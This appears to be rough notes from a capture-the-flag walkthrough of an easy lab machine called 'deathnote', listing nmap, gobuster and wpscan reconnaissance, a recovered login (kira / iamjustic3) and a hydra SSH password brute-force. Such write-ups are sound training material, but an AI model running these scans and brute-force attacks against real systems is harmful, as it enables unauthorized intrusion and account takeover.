Level - easy Description : don't waste too much time thinking outside the box . It is a Straight forward box . This works better with VirtualBox rather than VMware
netdiscover -i eth0
nmap -sS -sV -sC -p- ip
- The -sS option in nmap tells you to perform a stealth scan, that is, a scan in which the software tries not to be detected by the target host.
- The -sV option in nmap tells you to perform a version scan, that is, to try to identify the versions of services that respond to open ports.
- The -sC option in nmap tells you to run a scan script, that is, to use a set of predefined scripts to search for vulnerabilities or other information about running services.
nano /etc/hosts
this page was created with WordPress.
gobuster dir -u http://deathnote.vuln/wordpress/ -w /usr/share/wordlists/Discovery/Web-Content/directory-list-2.3-medium.txt
wpscan --url http://deathnote.vuln/wordpress/ -e u
Password
User:kira pass:iamjustic3
hydra -l l -P note ssh://192.168.56.103
- l in username